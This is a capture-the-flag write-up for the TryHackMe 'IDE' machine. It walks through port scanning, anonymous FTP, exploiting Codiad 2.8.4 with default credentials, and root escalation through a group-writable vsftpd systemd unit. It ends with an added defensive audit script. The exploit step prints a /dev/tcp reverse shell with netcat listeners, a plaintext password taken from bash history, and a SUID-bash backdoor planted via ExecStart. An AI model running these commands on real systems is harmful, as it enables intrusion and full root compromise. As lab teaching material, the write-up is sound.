
IDE (Codiad, Service)

First, enumerate the open ports with rustscan (which hands the discovered ports to nmap).

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide  
╰─➤  rustscan -a 10.10.149.33 | tee rust.log 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/hnl/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.10.149.33:21
Open 10.10.149.33:22
Open 10.10.149.33:80
Open 10.10.149.33:62337
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 02:05 +0630
Initiating Ping Scan at 02:05
Scanning 10.10.149.33 [2 ports]
Completed Ping Scan at 02:05, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:05
Completed Parallel DNS resolution of 1 host. at 02:05, 0.68s elapsed
DNS resolution of 1 IPs took 0.68s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 02:05
Scanning 10.10.149.33 [4 ports]
Discovered open port 80/tcp on 10.10.149.33
Discovered open port 21/tcp on 10.10.149.33
Discovered open port 22/tcp on 10.10.149.33
Discovered open port 62337/tcp on 10.10.149.33
Completed Connect Scan at 02:05, 0.31s elapsed (4 total ports)
Nmap scan report for 10.10.149.33
Host is up, received syn-ack (0.27s latency).
Scanned at 2022-04-24 02:05:13 +0630 for 1s

PORT      STATE SERVICE REASON
21/tcp    open  ftp     syn-ack
22/tcp    open  ssh     syn-ack
80/tcp    open  http    syn-ack
62337/tcp open  unknown syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds

Port 21

Anonymous FTP login is allowed. A plain "ls" shows an empty root, but "ls -al" reveals a directory named "..." that contains a single file named "-". Download it.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide  
╰─➤  ftp 10.10.149.33
Connected to 10.10.149.33.
220 (vsFTPd 3.0.3)
Name (10.10.149.33:hnl): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        114          4096 Jun 18  2021 .
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
drwxr-xr-x    2 0        0            4096 Jun 18  2021 ...
226 Directory send OK.
ftp> pwd
257 "/" is the current directory
ftp> cd ...
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             151 Jun 18  2021 -
226 Directory send OK.
ftp> get -
local: ./- remote: -
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for - (151 bytes).
226 Transfer complete.
151 bytes received in 0.00 secs (488.2812 kB/s)

Rename the downloaded file (its name is just "-") and read it.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide  
╰─➤  mv - file.txt                                                                   
╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide  
╰─➤  cat file.txt 
Hey john,
I have reset the password as you have asked. Please use the default password to login. 
Also, please take care of the image file ;)
- drac.

Port 80

Port 80 serves the default Apache page at http://10.10.149.33/.

Directory enumeration with gobuster turns up nothing interesting.

Port 62337

Port 62337 serves a Codiad 2.8.4 instance at http://10.10.149.33:62337/.

There is a public exploit for this version: https://www.exploit-db.com/raw/49705. The FTP note said john's password was reset to the default, and john:password logs in successfully.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/ide  
╰─➤  python3 exp.py http://10.10.149.33:62337/ john password 10.9.0.3 4444 linux
[+] Please execute the following command on your vps: 
echo 'bash -c "bash -i >/dev/tcp/10.9.0.3/4445 0>&1 2>&1"' | nc -lnvp 4444
nc -lnvp 4445
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"john"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"CloudCall","path":"\/var\/www\/html\/codiad_projects"}}
[+] Writeable Path : /var/www/html/codiad_projects
[+] Sending payload...

The netcat listener on port 4445 receives a reverse shell as www-data.

User

Reading user.txt as www-data gives "Permission denied".

drac's .bash_history contains a mysql command with the password passed on the command line.

www-data@ide:/home/drac$ cat .bash_history
cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'
www-data@ide:/home/drac$ 

The same password is reused for drac's account, so log in over SSH as drac with it.

Root

Check drac's sudo privileges.

drac@ide:~$ sudo -l
[sudo] password for drac: 
Matching Defaults entries for drac on ide:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart

Locate the vsftpd systemd unit file.

drac@ide:~$ find / -type f -name vsftpd.service 2>/dev/null
/lib/systemd/system/vsftpd.service
/var/lib/systemd/deb-systemd-helper-enabled/multi-user.target.wants/vsftpd.service

Check the unit file's permissions: it is owned by root:drac with mode 664, so drac has group write access and can modify it.

drac@ide:~$ ls -al /lib/systemd/system/vsftpd.service
-rw-rw-r-- 1 root drac 248 Aug  4  2021 /lib/systemd/system/vsftpd.service

Replace ExecStart so that, when systemd restarts the service as root, it copies bash to /tmp and marks the copy SUID:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/shell;chmod +xs /tmp/shell'
#ExecReload=/bin/kill -HUP $MAINPID
#ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

Restart the service through the permitted sudo command; systemd runs the new ExecStart as root.

drac@ide:~$ sudo /usr/sbin/service vsftpd restart

Run the SUID copy with -p so bash keeps the effective UID instead of dropping it.

drac@ide:~$ /tmp/shell -p
shell-4.4# whoami
root
shell-4.4# 
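The root cause here is the combination of a unit file writable by a non-root user and a sudo rule that restarts that service. The following audit script is an added example, not part of the original writeup: it lists unit files with group or world write bits or non-root ownership, and flags sudo rules of the "service <name> restart" / "systemctl restart" kind when fed the output of sudo -l. The sample sudo output inside it is constructed from the session above.

```shell
#!/bin/sh
# Added audit helper (not part of the original writeup). It looks for the two
# conditions that combined to give root above: a systemd unit file that a
# non-root user can edit, and a sudo rule that lets that user restart the
# service (systemd then runs the edited ExecStart as root).

# List *.service files under the given directories whose mode grants group or
# other write access (octal 020 = g+w, 002 = o+w). The fix for a hit is
# "chmod 644" and "chown root:root" on the unit, then "systemctl daemon-reload".
find_writable_units() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -name '*.service' \
            \( -perm -020 -o -perm -002 \) 2>/dev/null || :
    done
}

# Report unit files not owned by root; a unit owned by a user account is
# editable by that account whatever the mode bits say.
find_nonroot_units() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        find "$dir" -type f -name '*.service' ! -user root 2>/dev/null || :
    done
}

# Read 'sudo -l' output on stdin and print rules that allow starting or
# restarting a service via service(8) or systemctl. Such a rule is what turns
# a writable unit file into root code execution.
service_restart_rules() {
    grep -E '((^|[[:space:]/])service[[:space:]]+[^[:space:]]+[[:space:]]+(re)?start|systemctl[[:space:]]+(re)?start)' || :
}

# Constructed sample of the 'sudo -l' output seen above (second rule added as
# a benign control), so the script runs stand-alone.
SAMPLE_SUDO_L='User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart
    (ALL : ALL) /usr/bin/less /var/log/syslog'

# Stand-alone run: audit the standard unit directories, then the sample rules.
find_writable_units /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system
find_nonroot_units /etc/systemd/system /lib/systemd/system /usr/lib/systemd/system
printf '%s\n' "$SAMPLE_SUDO_L" | service_restart_rules
```

On the box in this writeup the first function would print /lib/systemd/system/vsftpd.service and the third would print the vsftpd restart rule, which together are the finding.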
